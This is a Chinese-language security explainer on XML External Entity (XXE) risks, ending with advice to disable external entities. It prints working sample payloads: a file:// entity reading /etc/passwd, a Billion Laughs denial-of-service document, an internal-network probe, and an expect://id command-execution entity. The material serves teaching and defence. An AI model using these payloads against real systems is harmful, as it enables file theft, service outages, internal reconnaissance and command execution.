XML外部实体引用(XXE)是XML解析过程中因未限制外部实体加载而产生的安全漏洞,攻击者可通过构造恶意XML内容触发多种安全风险,对系统安全造成严重威胁。
XML外部实体引用的主要风险
1. 敏感数据泄露
攻击者可以构造包含外部实体引用的XML,让解析器读取服务器本地的敏感文件,比如配置文件、数据库凭证、用户隐私数据等,并将读取的内容通过外部请求发送到攻击者控制的服务器。以下是一个模拟恶意XML的示例:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo>
如果XML解析器没有禁用外部实体,上述XML中的&xxe;会被替换为file:///etc/passwd文件的内容,攻击者就能获取到系统用户信息。
2. 拒绝服务攻击(DoS)
攻击者可以利用XML的实体递归引用构造恶意的XML内容,让解析器在解析时消耗大量CPU和内存资源,最终导致服务器瘫痪。这种攻击也被称为Billion Laughs攻击,示例如下:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
解析上述XML时,实体会不断递归展开,最终生成海量的字符串内容,快速耗尽服务器资源。
3. 内网服务探测
攻击者可以通过外部实体引用访问内网中的其他服务,比如数据库、缓存服务、内部API等,判断内网服务的存活情况和端口开放情况。示例如下:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://192.168.0.1:8080"> ]> <foo>&xxe;</foo>
如果内网192.168.0.1的8080端口开放,解析器会返回对应的响应内容,攻击者就能确认该内网服务的存在。
4. 远程代码执行
在特定场景下,比如XML解析器支持特定的协议,或者和存在漏洞的组件结合时,攻击者可以利用XXE执行远程代码。例如在PHP环境中,如果开启了expect扩展,攻击者可以构造如下恶意XML:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "expect://id"> ]> <foo>&xxe;</foo>
解析该XML时会执行id命令,返回当前用户的身份信息,严重情况下可以执行任意系统命令。
风险防护建议
要避免XML外部实体引用的风险,开发者可以在解析XML时禁用外部实体加载,比如在使用PHP的simplexml_load_string时设置对应的解析选项,在Java中使用DocumentBuilderFactory时禁用DOCTYPE声明。同时尽量使用JSON等更安全的格式传输数据,减少XML的使用场景,从根源上降低XXE漏洞的出现概率。